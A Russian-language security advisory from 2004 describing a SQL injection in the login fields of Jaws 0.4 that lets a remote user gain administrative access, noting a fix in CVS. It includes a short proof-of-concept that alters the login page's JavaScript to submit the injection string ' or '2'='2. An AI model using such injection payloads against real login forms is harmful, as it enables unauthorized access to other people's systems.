Security Lab

SQL инъекция в переменных “user”, “password” и "crypted_password" в Jaws

Дата публикации:01.08.2004
Всего просмотров:1393
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Jaws 0.4

Описание: Уязвимость SQL инъекции в Jaws позволяет удаленному пользователю получить административный доступ к приложению.

Удаленный пользователь может внедрить SQL комадны в “user”, “password” и "crypted_password" переменные. Пример (измените javascript функцию в Login.html):

<script type="text/javascript">

function crypt_form(form) {
   var new_password = calcMD5(form.password.value);
   form.crypted_password.value = "' or '2'='2";
   form.password.value = "";
   return true;
 
</script>

URL производителя:http://www.jaws.com.mx/

Решение:Исправление доступно через CVS.

Ссылки: Jaws 0.4: authentication bypass
DansGuardian Hex Encoding URL Banned Extension Filter Bypass